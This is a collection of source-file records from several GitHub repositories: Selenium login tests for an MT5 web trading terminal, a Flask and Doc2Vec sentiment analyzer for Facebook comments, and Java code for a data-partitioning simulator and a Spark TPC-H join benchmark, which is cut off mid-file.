"num_lines": 46, "path": "/fixture/login_page.py", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "from selenium.common.exceptions import NoSuchElementException\n\nfrom locators.login_page import Authorization\nfrom fixture._base import log\n\n\nclass LoginPage:\n def __init__(self, app):\n self.app = app\n\n def open(self):\n log.info(f\"Open {self.app.base_url}\")\n self.app.wd.get(self.app.base_url)\n\n def auth_terminal(self, login, password, mt5_platform=True):\n log.info(f\"Auth in terminal, login = {login}, password = {password}\")\n if mt5_platform:\n self.select_mt5_platform().click()\n self.password_input().send_keys(password)\n self.login_input().send_keys(login)\n self.button_login().click()\n\n def password_input(self):\n return self.app.wd.find_element(*Authorization.PASSWORD_INPUT)\n\n def login_input(self):\n return self.app.wd.find_element(*Authorization.LOGIN_INPUT)\n\n def select_mt5_platform(self):\n return self.app.wd.find_element(*Authorization.MT5_PLATFORM)\n\n def button_login(self):\n return self.app.wd.find_element(*Authorization.BTN_LOGIN)\n\n def total_field(self):\n return self.app.wd.find_element(*Authorization.TOTAL_FIELD)\n\n def account_info(self):\n return self.app.wd.find_element(*Authorization.ACCOUNT_INFO)\n\n def is_auth(self, username):\n try:\n if username in self.account_info().text():\n return True\n except NoSuchElementException:\n return False\n" }, { "alpha_fraction": 0.5858823657035828, "alphanum_fraction": 0.6447058916091919, "avg_line_length": 19.238094329833984, "blob_id": "5ef9d3100c1f75514593f3e7c46e3c992014ab2f", "content_id": "2b8a6b5c0e50f6ca341aa0aea8f99cace0095515", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 425, "license_type": "permissive", "max_line_length": 52, "num_lines": 21, "path": "/pyproject.toml", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "[tool.poetry]\nname = \"WT_MT5\"\nversion = \"1.0\"\ndescription = \"\"\nauthors = [\"mq_old_qa\"]\n\n[tool.poetry.dependencies]\npython = \"^3.6\"\nselenium = \"^3.141\"\npytest = \"^5.3\"\nwebdrivermanager = \"^0.7.4\"\nwebdriver_manager = \"^2.3\"\npre-commit = \"^1.20\"\nflake8 = \"^3.7\"\n\n[tool.poetry.dev-dependencies]\nblack = { version = \"*\", allows-prereleases = true }\n\n[build-system]\nrequires = [\"poetry>=0.12\"]\nbuild-backend = \"poetry.masonry.api\"\n" }, { "alpha_fraction": 0.8020833134651184, "alphanum_fraction": 0.8020833134651184, "avg_line_length": 18.200000762939453, "blob_id": "4bb134afe54fa31ae9ea1510b71062097bc86fb1", "content_id": "0d61ee15897bf40f0a5f1b4383621a2d4209c39a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 96, "license_type": "permissive", "max_line_length": 39, "num_lines": 5, "path": "/fixture/_base.py", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "import logging\n\nlogging.basicConfig(level=logging.INFO)\n\nlog = logging.getLogger(\"WebTerminal\")\n" }, { "alpha_fraction": 0.5672268867492676, "alphanum_fraction": 0.5714285969734192, "avg_line_length": 20.636363983154297, "blob_id": "bcb36ffc5f2938b338aa3b80c4cb69e5b3d15ca7", "content_id": "e7cfb548edc1fef4ad79ebf5b0a7d2a29fa031e2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 238, "license_type": "permissive", "max_line_length": 52, "num_lines": 11, "path": "/tests/test_menu.py", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "# import pytest\n\n\n# class TestMenu:\n# @pytest.mark.issue(id=\"x\")\n# def test_menu_text(self, app, auth_netting):\n# pass\n#\n# @pytest.mark.issue(id=\"x\")\n# def test_menu_text_2(self, app, auth_netting):\n# pass\n" }, { "alpha_fraction": 0.6918032765388489, "alphanum_fraction": 0.6950819492340088, "avg_line_length": 24.41666603088379, "blob_id": "d72b8da7d305248637a7ad0837071f4cfa8ac439", "content_id": "2548478dd03427cbef5b511258e443c385042874", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 305, "license_type": "permissive", "max_line_length": 79, "num_lines": 12, "path": "/tests/test_login.py", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "import pytest\n\n\nfrom common.common import NETTING_ACCOUNT\n\n\nclass TestLogin:\n @pytest.mark.issue(id=\"1\")\n def test_login(self, app):\n app.auth.open()\n app.auth.auth_terminal(NETTING_ACCOUNT.login, NETTING_ACCOUNT.password)\n assert app.auth.total_field(), \"Authorization failed\"\n" }, { "alpha_fraction": 0.6954887509346008, "alphanum_fraction": 0.6954887509346008, "avg_line_length": 30.294116973876953, "blob_id": "350821a9ea3073e2bf10287fc99c325488968ec2", "content_id": "4a68969bf6f78291996cd96e401f8ae55298208b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 532, "license_type": "permissive", "max_line_length": 59, "num_lines": 17, "path": "/fixture/application.py", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "from fixture.login_page import LoginPage\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\n\n\nclass Application:\n def __init__(self, base_url):\n options: Options = Options()\n options.headless = True\n driver = ChromeDriverManager().install()\n self.wd = webdriver.Chrome(driver, options=options)\n self.auth = LoginPage(self)\n self.base_url = base_url\n\n def destroy(self):\n self.wd.quit()\n" }, { "alpha_fraction": 0.6748971343040466, "alphanum_fraction": 0.6790123581886292, "avg_line_length": 24.13793182373047, "blob_id": "5e2d0fe326d9dab8362326721b9f23e3fed334fa", "content_id": "8145be52efea74b03f5b43c1e53cd198f1584621", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 729, "license_type": "permissive", "max_line_length": 79, "num_lines": 29, "path": "/conftest.py", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "import pytest\nfrom common.common import NETTING_ACCOUNT\nfrom fixture.application import Application\n\n\[email protected](scope=\"session\")\ndef app(request):\n base_url = request.config.getoption(\"--base_url\")\n fixture = Application(base_url)\n fixture.wd.maximize_window()\n fixture.wd.implicitly_wait(10)\n yield fixture\n fixture.destroy()\n\n\ndef pytest_addoption(parser):\n parser.addoption(\n \"--base_url\",\n action=\"store\",\n default=\"https://trade.mql5.com/trade\",\n help=\"base_url\",\n )\n\n\[email protected]()\ndef auth_netting(app):\n if not app.auth.is_auth(NETTING_ACCOUNT.login):\n app.auth.open()\n app.auth.auth_terminal(NETTING_ACCOUNT.login, NETTING_ACCOUNT.password)\n" }, { "alpha_fraction": 0.6169772148132324, "alphanum_fraction": 0.6252588033676147, "avg_line_length": 36.153846740722656, "blob_id": "47440b46f54cf856a45bab71bc45d38b4561c2f5", "content_id": "c52ad7676284b5fdc38c4c66eddcc818a8696a34", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 483, "license_type": "permissive", "max_line_length": 78, "num_lines": 13, "path": "/locators/login_page.py", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "from selenium.webdriver.common.by import By\n\n\nclass Authorization:\n LOGIN_INPUT = (By.ID, \"login\")\n PASSWORD_INPUT = (By.ID, \"password\")\n SAVE_PASSWORD_CHECKBOX = (By.ID, \"save\")\n SERVER_INPUT = (By.ID, \"server\")\n MT4_PLATFORM = (By.ID, \"mt4-platform\")\n MT5_PLATFORM = (By.ID, \"mt5-platform\")\n BTN_LOGIN = (By.XPATH, \"//button[@class='input-button' and text()='OK']\")\n TOTAL_FIELD = (By.ID, \"total\")\n ACCOUNT_INFO = (By.CLASS_NAME, \"page-text account\")\n" }, { "alpha_fraction": 0.7111111283302307, "alphanum_fraction": 0.7111111283302307, "avg_line_length": 21, "blob_id": "b953c6d7b1bee8bd7a47663de615a1c75511f9ae", "content_id": "87da065728fa9a2ae3422b829ee537cebb1e7431", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 45, "license_type": "permissive", "max_line_length": 34, "num_lines": 2, "path": "/pytest.ini", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "[pytest]\nmarkers = issue: see doc/TEST_CASE\n\n" } ]
13
TaeMinPark/Facebook-Comments-Sentiment-Analyzer
https://github.com/TaeMinPark/Facebook-Comments-Sentiment-Analyzer
f1471db0c0d3770456a7c0d1d61c4933d476ca80
de3cacc5f35a12b6853b58880127cd14b07c8b43
1c64a4967e2ad2c3de269ca845e6c38ec5f7ca7e
refs/heads/master
2021-09-05T02:58:50.147616
2018-01-23T20:04:00
2018-01-23T20:04:00
118,661,920
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5743769407272339, "alphanum_fraction": 0.5957943797111511, "avg_line_length": 25.204082489013672, "blob_id": "e848388224d0a3449dac62aa41981a3a9aa2de7c", "content_id": "bdfd55e593e6c97831be8acf4afac10ec6b1140d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2592, "license_type": "no_license", "max_line_length": 122, "num_lines": 98, "path": "/doc2vec.py", "repo_name": "TaeMinPark/Facebook-Comments-Sentiment-Analyzer", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n__author__ = 'Min'\n\n\"\"\"\n\nDoc2Vec utilities.\n\nRequires pre-trained model\n\n\"\"\"\n\nfrom konlpy.tag import Twitter # To morphologic analyze\nfrom gensim.models import Doc2Vec\nimport nltk\n\n\ntwitter = Twitter()\n\n\ndef tokenize(doc):\n \"\"\"\n Tokenize document\n\n ex) 가다/동사\n :param doc: document to tokenize\n :return: tokenized document array\n \"\"\"\n return ['/'.join(twit) for twit in twitter.pos(doc, norm=True, stem=True)]\n\n\ndef load_doc2vec_model(path):\n \"\"\"\n load pre-trained doc2vec model\n :param path: path of pre-trained doc2vec model\n :return: doc2vec object\n \"\"\"\n # load train data\n return Doc2Vec.load(path)\n\n\ndef analyze_single_comment(model, tokenized_comment):\n \"\"\"\n analyze single comment if this is positive or negative.\n\n :param model: doc2vec model\n :param tokenized_comment: comment to analyze\n :return: result. '0': Negative, '1': Positive\n \"\"\"\n new_vector = model.infer_vector(tokenized_comment)\n sims = model.docvecs.most_similar([new_vector])\n return sims[0][0]\n\n\ndef analyze_comments(model, comments):\n \"\"\"\n analyze if this comments are positive or negative. And return results.\n\n :param model: doc2vec model\n :param comments: comments to analyze\n :return: result dictionary. ex)\n\n {\n 'positive': {'count': 3, \"most_common_words\": [('./Punctuation', 68630), ('영화/Noun', 51365), ('하다/Verb', 50281)]},\n 'negative': {'count': 2, \"most_common_words\": [('./Punctuation', 68630), ('영화/Noun', 51365), ('하다/Verb', 50281)]}\n }\n \"\"\"\n negative_words_tokens = []\n positive_words_tokens = []\n positive_count = 0\n negative_count = 0\n\n for comment in comments:\n tokenized_comment = tokenize(comment)\n result = analyze_single_comment(model, tokenized_comment)\n if result == '0':\n # negative\n negative_count += 1\n for token in tokenized_comment:\n negative_words_tokens.append(token)\n\n else:\n # positive\n positive_count += 1\n for token in tokenized_comment:\n positive_words_tokens.append(token)\n\n return {\n 'positive':\n {\n 'count': positive_count,\n 'most_common_words': nltk.Text(positive_words_tokens, name='NMSC').vocab().most_common(10)\n },\n 'negative':\n {\n 'count': negative_count,\n 'most_common_words': nltk.Text(negative_words_tokens, name='NMSC').vocab().most_common(10)\n }\n }\n" }, { "alpha_fraction": 0.6590805649757385, "alphanum_fraction": 0.6777423620223999, "avg_line_length": 27.179487228393555, "blob_id": "cf769023dc569b4b8abcc4e866d91aeeac629d7e", "content_id": "ca58403a3515678c3600e3189e88872074bb83d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2197, "license_type": "no_license", "max_line_length": 120, "num_lines": 78, "path": "/doc2vec_train.py", "repo_name": "TaeMinPark/Facebook-Comments-Sentiment-Analyzer", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n__author__ = 'Min'\n\n\"\"\"\n\ntrain and save Doc2Vec model\n\n\"\"\"\n\nfrom collections import namedtuple\nfrom gensim.models import doc2vec\nfrom konlpy.tag import Twitter\nimport multiprocessing\n\ntwitter = Twitter()\nTaggedDocument = namedtuple('TaggedDocument', 'words tags') # taggeddocument to train doc2vec. (document, (pos or neg))\n\n\ndef read_data(file_name):\n \"\"\"\n read data from file\n :param file_name: name of file\n :return: array of each line. each lines are splitted by tab.\n \"\"\"\n with open(file_name, 'r') as file_obj:\n data = [line.split('\\t') for line in file_obj.read().splitlines()]\n return data\n\n\ndef tokenize(doc):\n \"\"\"\n tokenize words\n\n :param doc: document to tokenize\n :return: tokenized array\n \"\"\"\n return ['/'.join(twit) for twit in twitter.pos(doc, norm=True, stem=True)]\n\n\ndef get_tagged_documents(data):\n \"\"\"\n tokenize and return data in format of tagged document which need to train doc2vec.\n :param data: data to train.\n :return: toakenized and taggeddocument data\n \"\"\"\n return [TaggedDocument(tokenize(row[1]), [row[2]]) for row in data[1:]]\n\ncores = multiprocessing.cpu_count()\n\nvector_size = 300\nwindow_size = 8\ntrain_epoch = 100\nmin_count = 5\nis_dm = 1\nseed_num = 1234\niteration_count = 10\nworkers_count = cores # workers are count of ores\n\n\ndata = read_data('data/ratings_train.txt')\ntagged_train_docs = get_tagged_documents(data)\n\n# doc2vec setup\nprint('doc2vec setup')\ndoc_vectorizer = doc2vec.Doc2Vec(size=vector_size, alpha=0.025, min_alpha=0.025, window=window_size,\n min_count=min_count, dm=is_dm, seed=seed_num, iter=iteration_count,\n workers=workers_count, hs=1)\ndoc_vectorizer.build_vocab(tagged_train_docs)\n\nprint('start training')\nfor epoch in range(iteration_count):\n doc_vectorizer.train(tagged_train_docs, total_examples=doc_vectorizer.corpus_count, epochs=iteration_count)\n doc_vectorizer.alpha -= 0.002\n doc_vectorizer.min_alpha = doc_vectorizer.alpha\n print('epoch' + str(epoch) + \" Finished\")\n\ndoc_vectorizer.save('models/doc2vec_dm{}.model'.format(str(is_dm))) # save model\nprint('finished.')" }, { "alpha_fraction": 0.7129186391830444, "alphanum_fraction": 0.7368420958518982, "avg_line_length": 22.22222137451172, "blob_id": "e2c2d515406b2cd4978cef0ff9f37fd4251f3abc", "content_id": "8a73e5027401d54baa0082d953ad9fbf71615343", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 418, "license_type": "no_license", "max_line_length": 75, "num_lines": 18, "path": "/global_objects.py", "repo_name": "TaeMinPark/Facebook-Comments-Sentiment-Analyzer", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n__author__ = 'Min'\n\n\"\"\"\n\nglobal objects which requires throughout entire program\n\nFlask application for routing and doc2vec model\n\n\"\"\"\n\nfrom flask import Flask\nfrom doc2vec import load_doc2vec_model\n\nflask_application = Flask(__name__) # flask application\nprint('loading doc2vec model')\ndoc2vec_model = load_doc2vec_model('models/doc2vec.model') # doc2vec model\nprint('loaded doc2vec model')\n" }, { "alpha_fraction": 0.6263952851295471, "alphanum_fraction": 0.6290216445922852, "avg_line_length": 28.86274528503418, "blob_id": "cffcbe817c532a5f19ffed2bd1b98c72c8c56aa7", "content_id": "657b1d13d95af5ca2f60eb86c399a75afd8ec76c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1523, "license_type": "no_license", "max_line_length": 81, "num_lines": 51, "path": "/comments.py", "repo_name": "TaeMinPark/Facebook-Comments-Sentiment-Analyzer", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n__author__ = 'Min'\n\n\"\"\"\n\nFunctions that requires to download comments from facebook graph API.\n\nFacebook access token, post ID, and user ID of the post should be given.\n\nYou can get a token from here: https://developers.facebook.com/tools/explorer/\n\n\"\"\"\n\nimport requests\n\nGRAPH_API_VERSION = 'v2.11'\n\n\ndef get_comments(access_token, post_user_id, post_id):\n \"\"\"\n get comments from a facebook post until there is no more comments left\n\n :param access_token: access token to call graph api\n :param post_user_id: facebook user id of the post\n :param post_id: facebook post id\n :return: comments array\n \"\"\"\n\n request_url = 'https://graph.facebook.com/{}/{}_{}/comments?access_token={}'\\\n .format(GRAPH_API_VERSION, post_user_id, post_id, access_token)\n request_obj = requests.get(request_url)\n\n comments = []\n while True:\n request_data = request_obj.json() # json to arrays\n\n # if error\n if \"error\" in request_obj:\n raise Exception(request_data['error']['message'])\n\n for comment in request_data['data']:\n # line break to a single tab\n message = comment['message'].replace('\\n', '\\t')\n comments.append(message)\n\n # more comments?\n if 'paging' in request_data and 'next' in request_data['paging']:\n request_obj = requests.get(request_data['paging']['next'])\n else:\n # return comments when there is no more comments left\n return comments\n" }, { "alpha_fraction": 0.5733944773674011, "alphanum_fraction": 0.6009174585342407, "avg_line_length": 13.533333778381348, "blob_id": "f6ca48bf2a28a7c253ef0d1b51a709d6c7dd95de", "content_id": "6a7707ff0e8bd9f66ddf98a3d3dc304d7e76e1c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 218, "license_type": "no_license", "max_line_length": 60, "num_lines": 15, "path": "/__init__.py", "repo_name": "TaeMinPark/Facebook-Comments-Sentiment-Analyzer", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n__author__ = 'Min'\n\n\"\"\"\n\nfacebook comments sentiment analyzer using Doc2Vec\n\n\n\n\"\"\"\nfrom routes import *\n\n\nif __name__ == '__main__':\n flask_application.run(host='0.0.0.0') # run application\n" }, { "alpha_fraction": 0.6266433000564575, "alphanum_fraction": 0.6301490068435669, "avg_line_length": 31.628570556640625, "blob_id": "fbe1e9682811490e92349312c2f7e4e92c3dcf24", "content_id": "63f4ce2dccfe1d264716b50cb5a372fe4a3337e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1141, "license_type": "no_license", "max_line_length": 106, "num_lines": 35, "path": "/routes.py", "repo_name": "TaeMinPark/Facebook-Comments-Sentiment-Analyzer", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n__author__ = 'Min'\n\n\"\"\"\n\nWeb routing using flask framework\n\n\"\"\"\n\nfrom global_objects import flask_application, doc2vec_model\nfrom flask import render_template, request\nfrom comments import get_comments\nfrom doc2vec import analyze_comments\n\n\n@flask_application.route('/', methods=[\"GET\"])\ndef index():\n return render_template('index.html')\n\n\n@flask_application.route('/analyze', methods=['POST'])\ndef analyze():\n access_token = request.form['token']\n post_user_id = request.form['post_user_id']\n post_id = request.form['post_id']\n\n comments = get_comments(access_token, post_user_id, post_id)\n analyze_result = analyze_comments(doc2vec_model, comments)\n\n return render_template('analyze.html',\n positive_count = analyze_result['positive']['count'],\n negative_count = analyze_result['negative']['count'],\n positive_most_frequent_words = analyze_result['positive']['most_common_words'],\n negative_most_frequent_words = analyze_result['negative']['most_common_words']\n )" } ]
6
qinzhewudao/GraduationProject
https://github.com/qinzhewudao/GraduationProject
84c0f34e7022969bdbaa827208f3b70f7e62e1bb
1493cb45f0cc385b1dc0f2075b5db75011fa19cc
1b1b0de15839a189d994d0c0a2d6931289f87a33
refs/heads/master
2020-03-06T21:30:20.614439
2018-03-28T10:35:00
2018-03-28T10:35:00
127,079,028
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6519396305084229, "alphanum_fraction": 0.6526580452919006, "avg_line_length": 31, "blob_id": "753a68dba23fddda6bd0097672a9618e6871c7c4", "content_id": "c00dbc2117a9f1e827804551df244df216f78d8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2784, "license_type": "no_license", "max_line_length": 84, "num_lines": 87, "path": "/src/main/java/core/simulator/Simulator.java", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "package core.simulator;\n\nimport core.adapt.AccessMethod.PartitionSplit;\nimport core.adapt.Query;\nimport core.adapt.iterator.RepartitionIterator;\nimport core.adapt.opt.Optimizer;\nimport core.common.globals.Globals;\nimport core.utils.ConfUtils;\nimport core.utils.CuratorUtils;\nimport core.utils.HDFSUtils;\nimport org.apache.curator.framework.CuratorFramework;\nimport org.apache.hadoop.fs.FileSystem;\n\npublic class Simulator {\n\tOptimizer opt;\n\n\tConfUtils cfg;\n\n\tString simName;\n\n\tString dataset;\n\n\tQuery[] queries;\n\n\tpublic void setUp(ConfUtils cfg, String simName, String dataset, Query[] queries) {\n\t\tthis.cfg = cfg;\n\t\tthis.simName = simName;\n\t\tthis.dataset = dataset;\n\t\tthis.queries = queries;\n\n\t\tFileSystem fs = HDFSUtils.getFSByHadoopHome(cfg.getHADOOP_HOME());\n\n\t\tHDFSUtils.deleteFile(fs,\n\t\t\t\tcfg.getHDFS_WORKING_DIR() + \"/\" + simName, true);\n\t\tHDFSUtils.safeCreateDirectory(fs, cfg.getHDFS_WORKING_DIR() + \"/\" + simName);\n\n\t\tCuratorFramework client = CuratorUtils.createAndStartClient(\n\t\t\t\tcfg.getZOOKEEPER_HOSTS());\n\t\tCuratorUtils.deleteAll(client, \"/\", \"partition-\");\n\t\tCuratorUtils.stopClient(client);\n\n\t\tHDFSUtils.copyFile(fs, cfg.getHDFS_WORKING_DIR() + \"/\" + dataset + \"/\" + \"index\",\n\t\t\t\tcfg.getHDFS_WORKING_DIR() + \"/\" + simName + \"/\" + \"index\",\n\t\t\t\tcfg.getHDFS_REPLICATION_FACTOR());\n\t\tHDFSUtils.copyFile(fs, cfg.getHDFS_WORKING_DIR() + \"/\" + dataset + \"/\" + \"sample\",\n\t\t\t\tcfg.getHDFS_WORKING_DIR() + \"/\" + simName + \"/\" + \"sample\",\n\t\t\t\tcfg.getHDFS_REPLICATION_FACTOR());\n\t\tHDFSUtils.copyFile(fs, cfg.getHDFS_WORKING_DIR() + \"/\" + dataset + \"/\" + \"info\",\n\t\t\t\tcfg.getHDFS_WORKING_DIR() + \"/\" + simName + \"/\" + \"info\",\n\t\t\t\tcfg.getHDFS_REPLICATION_FACTOR());\n\n Globals.loadTableInfo(simName, cfg.getHDFS_WORKING_DIR(), fs);\n\n\t\topt = new Optimizer(cfg);\n\t\topt.loadIndex(Globals.getTableInfo(simName));\n\t}\n\n\tpublic void runOld() {\n\t\tfor (int i=0; i<queries.length; i++) {\n\t\t\tQuery q = queries[i];\n\t\t\tq.setTable(simName);\n PartitionSplit[] splits = opt.buildPlan(q);\n\n // Check if there was an index update. If yes, we need\n // to reload the index.\n for (PartitionSplit p: splits) {\n if (p.getIterator().getClass() == RepartitionIterator.class) {\n System.out.println(\"INFO: Reloading index ..\");\n opt.loadIndex(Globals.getTableInfo(simName));\n break;\n }\n }\n\t\t}\n\t}\n\n public void run() {\n\t\tfor (int i=0; i<queries.length; i++) {\n\t\t\tQuery q = queries[i];\n\t\t\tq.setTable(simName);\n PartitionSplit[] splits = opt.buildMultiPredicatePlan(q);\n\n\t\t\t// When using the multi-predicate plan builder, the rt gets dirtied\n\t\t\t// We need to reload for every query.\n opt.loadIndex(Globals.getTableInfo(simName));\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.6158192157745361, "alphanum_fraction": 0.6629002094268799, "avg_line_length": 28.44444465637207, "blob_id": "732ae9d701cb6603c00ded293c1cad77ea905884", "content_id": "b752232593eb481e6222018d2d8a13ecf394127b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 531, "license_type": "no_license", "max_line_length": 96, "num_lines": 18, "path": "/data/gen_simple.py", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "\"\"\"\nUsed to generate the simple dataset for testing.\nGenerates a dataset with 1000 tuples, 2 attributes A & B.\nEach attribute takes values randomly from 1 to 1000.\n\"\"\"\n\nimport os\nimport random\n\nif __name__ == \"__main__\":\n dir_path = os.path.dirname(os.path.realpath(__file__))\n os.chdir(dir_path)\n if not os.path.isdir(\"simple\"):\n os.system(\"mkdir simple\")\n\n os.chdir(\"simple\")\n rands = [\"%d|%d\\n\" % (random.randint(1,1000), random.randint(1,1000)) for i in xrange(0,1000)]\n open(\"simple.txt\", \"w\").write(\"\".join(rands))\n\n" }, { "alpha_fraction": 0.6338028311729431, "alphanum_fraction": 0.6338028311729431, "avg_line_length": 9.142857551574707, "blob_id": "5632a3bca2cdd260af4b6978fde9de96d6803c95", "content_id": "6b889e20f2cb71f9705a79d22c44a77d7097c842", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 71, "license_type": "no_license", "max_line_length": 28, "num_lines": 7, "path": "/src/test/java/core/adapt/spark/TPCHQueryTest.java", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "package core.adapt.spark;\n\n/**\n * .\n */\npublic class TPCHQueryTest {\n}\n" }, { "alpha_fraction": 0.5169643759727478, "alphanum_fraction": 0.5368112921714783, "avg_line_length": 36.521278381347656, "blob_id": "e6d74870996e7e37f769d3b10a25b5ea18170d5b", "content_id": "8600a55e55dd6bee64c0c3e7ae012a41fd634493", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 21204, "license_type": "no_license", "max_line_length": 134, "num_lines": 564, "path": "/src/main/java/perf/benchmark/TPCHSparkJoinWorkload.java", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "package perf.benchmark;\n\nimport core.utils.ConfUtils;\nimport core.utils.TypeUtils.SimpleDate;\nimport org.apache.hadoop.mapred.FileInputFormat;\nimport org.apache.spark.SparkConf;\nimport org.apache.spark.api.java.JavaSparkContext;\nimport org.apache.spark.sql.DataFrame;\nimport org.apache.spark.sql.SQLContext;\n\nimport java.util.Calendar;\nimport java.util.GregorianCalendar;\nimport java.util.Random;\n\n/**\n * Created by ylu on 1/4/16.\n */\n\n\npublic class TPCHSparkJoinWorkload {\n\n private ConfUtils cfg;\n\n private String lineitem = \"lineitem\", orders = \"orders\", customer = \"customer\", supplier = \"supplier\", part = \"part\";\n\n private static String[] mktSegmentVals = new\n String[]{\"AUTOMOBILE\", \"BUILDING\", \"FURNITURE\", \"HOUSEHOLD\", \"MACHINERY\"};\n private static String[] regionNameVals = new\n String[]{\"AFRICA\", \"AMERICA\", \"ASIA\", \"EUROPE\", \"MIDDLE EAST\"};\n private static String[] partTypeVals = new\n String[]{\"BRASS\", \"COPPER\", \"NICKEL\", \"STEEL\", \"TIN\"};\n private static String[] shipModeVals = new\n String[]{\"AIR\", \"FOB\", \"MAIL\", \"RAIL\", \"REG AIR\", \"SHIP\", \"TRUCK\"};\n\n\n private int method;\n private int numQueries;\n\n private Random rand;\n\n private JavaSparkContext ctx;\n private SQLContext sqlContext;\n\n public void setUp() {\n cfg = new ConfUtils(BenchmarkSettings.conf);\n rand = new Random();\n // Making things more deterministic.\n rand.setSeed(0);\n\n SparkConf sconf = new SparkConf().setMaster(cfg.getSPARK_MASTER())\n .setAppName(this.getClass().getName())\n .setSparkHome(cfg.getSPARK_HOME())\n .setJars(new String[]{cfg.getSPARK_APPLICATION_JAR()})\n .set(\"spark.hadoop.cloneConf\", \"false\")\n .set(\"spark.executor.memory\", cfg.getSPARK_EXECUTOR_MEMORY())\n .set(\"spark.driver.memory\", cfg.getSPARK_DRIVER_MEMORY())\n .set(\"spark.task.cpus\", cfg.getSPARK_TASK_CPUS());\n\n try {\n sconf.registerKryoClasses(new Class<?>[]{\n Class.forName(\"org.apache.hadoop.io.LongWritable\"),\n Class.forName(\"org.apache.hadoop.io.Text\")\n });\n } catch (ClassNotFoundException e) {\n e.printStackTrace();\n }\n\n ctx = new JavaSparkContext(sconf);\n ctx.hadoopConfiguration().setBoolean(\n FileInputFormat.INPUT_DIR_RECURSIVE, true);\n ctx.hadoopConfiguration().set(\"fs.hdfs.impl\",\n org.apache.hadoop.hdfs.DistributedFileSystem.class.getName());\n\n sqlContext = new SQLContext(ctx);\n\n // Create customer table\n String customerPath = cfg.getHDFS_WORKING_DIR() + \"/\" + customer + \"/data\";\n\n sqlContext.sql(\"CREATE TEMPORARY TABLE customer (c_custkey int, c_name string, c_address string, \"\n + \"c_phone string, c_acctbal double, c_mktsegment string , c_nation string, c_region string) \"\n + \"USING com.databricks.spark.csv \"\n + \"OPTIONS (path \\\"\" + customerPath + \"\\\", header \\\"false\\\", delimiter \\\"|\\\")\");\n\n // Create order table.\n String ordersPath = cfg.getHDFS_WORKING_DIR() + \"/\" + orders + \"/data\";\n\n sqlContext.sql(\"CREATE TEMPORARY TABLE orders (o_orderkey long, o_custkey int, \"\n + \"o_orderstatus string, o_totalprice double, o_orderdate string, \"\n + \"o_orderpriority string, o_clerk string, o_shippriority int) \"\n + \"USING com.databricks.spark.csv \"\n + \"OPTIONS (path \\\"\" + ordersPath + \"\\\", header \\\"false\\\", delimiter \\\"|\\\")\");\n\n\n // Create lineitem table.\n String lineitemPath = cfg.getHDFS_WORKING_DIR() + \"/\" + lineitem + \"/data\";\n\n sqlContext.sql(\"CREATE TEMPORARY TABLE lineitem (l_orderkey long, l_partkey int, l_suppkey int, \"\n + \"l_linenumber int, l_quantity double, l_extendedprice double, l_discount double, \"\n + \"l_tax double, l_returnflag string, l_linestatus string, l_shipdate string, \"\n + \"l_commitdate string, l_receiptdate string, l_shipinstruct string, l_shipmode string) \"\n + \"USING com.databricks.spark.csv \"\n + \"OPTIONS (path \\\"\" + lineitemPath + \"\\\", header \\\"false\\\", delimiter \\\"|\\\")\");\n\n // Create supplier table.\n String supplierPath = cfg.getHDFS_WORKING_DIR() + \"/\" + supplier + \"/data\";\n\n sqlContext.sql(\"CREATE TEMPORARY TABLE supplier (s_suppkey int, s_name string, s_address string, \"\n + \"s_phone string, s_acctbal double, s_nation string, s_region string) \"\n + \"USING com.databricks.spark.csv \"\n + \"OPTIONS (path \\\"\" + 